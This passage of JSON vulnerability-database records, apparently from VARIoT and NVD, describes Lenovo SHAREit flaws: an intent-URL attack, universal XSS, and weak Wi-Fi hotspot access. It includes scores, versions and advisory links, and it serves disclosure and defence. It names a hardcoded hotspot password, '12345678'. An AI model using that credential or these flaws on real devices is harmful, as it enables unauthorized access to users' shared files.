"id": "VHN-93602"
},
{
"db": "BID",
"id": "90833"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-05-23T00:00:00",
"db": "VULHUB",
"id": "VHN-93602"
},
{
"date": "2016-05-20T00:00:00",
"db": "BID",
"id": "90833"
},
{
"date": "2016-05-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"date": "2016-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"date": "2016-05-23T19:59:13.167000",
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-05-25T00:00:00",
"db": "VULHUB",
"id": "VHN-93602"
},
{
"date": "2016-05-20T00:00:00",
"db": "BID",
"id": "90833"
},
{
"date": "2016-05-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"date": "2016-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Android Run on Lenovo SHAREit Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
}
],
"trust": 0.6
}
}
VAR-201605-0268
Vulnerability from variot - Updated: 2025-04-12 23:16Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an "intent scheme URL attack.". Lenovo SHAREit (Eggplant Express) on Android is a set of file sharing software based on the Android platform of China Lenovo (Lenovo). There is a security vulnerability in Lenovo SHAREit versions earlier than 3.5.98_ww based on platforms earlier than Android 4.2
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201605-0268",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "eq",
"trust": 1.0,
"vendor": "lenovo",
"version": "3.5.98_ww"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.5.98_ww (android 4.2 )"
},
{
"model": "android",
"scope": "eq",
"trust": 0.6,
"vendor": "google",
"version": "4.1.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
}
]
},
"cve": "CVE-2016-4782",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2016-4782",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-93601",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2016-4782",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-4782",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-4782",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201605-584",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-93601",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93601"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an \"intent scheme URL attack.\". Lenovo SHAREit (Eggplant Express) on Android is a set of file sharing software based on the Android platform of China Lenovo (Lenovo). There is a security vulnerability in Lenovo SHAREit versions earlier than 3.5.98_ww based on platforms earlier than Android 4.2",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4782"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "VULHUB",
"id": "VHN-93601"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-4782",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-93601",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93601"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"id": "VAR-201605-0268",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-93601"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-12T23:16:41.205000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-6421",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_6421"
},
{
"title": "Lenovo SHAREit Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=61897"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93601"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4782"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4782"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93601"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-93601"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-05-23T00:00:00",
"db": "VULHUB",
"id": "VHN-93601"
},
{
"date": "2016-05-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"date": "2016-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"date": "2016-05-23T19:59:12.197000",
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-05-25T00:00:00",
"db": "VULHUB",
"id": "VHN-93601"
},
{
"date": "2016-05-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002919"
},
{
"date": "2016-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-584"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-4782"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Android Run on Lenovo SHAREit Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002919"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201605-584"
}
],
"trust": 0.6
}
}
CVE-2016-4783 (GCVE-0-2016-4783)
Vulnerability from nvd – Published: 2016-05-23 19:00 – Updated: 2024-08-06 00:39- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:39:26.176Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-05-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"Universal XSS (UXSS).\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4783",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"Universal XSS (UXSS).\""
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4783",
"datePublished": "2016-05-23T19:00:00.000Z",
"dateReserved": "2016-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T00:39:26.176Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-4782 (GCVE-0-2016-4782)
Vulnerability from nvd – Published: 2016-05-23 19:00 – Updated: 2024-08-06 00:39- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:39:26.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-05-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an \"intent scheme URL attack.\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4782",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an \"intent scheme URL attack.\""
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4782",
"datePublished": "2016-05-23T19:00:00.000Z",
"dateReserved": "2016-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T00:39:26.240Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1492 (GCVE-0-2016-1492)
Vulnerability from nvd – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.636Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1492",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1492",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1491 (GCVE-0-2016-1491)
Vulnerability from nvd – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1491",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
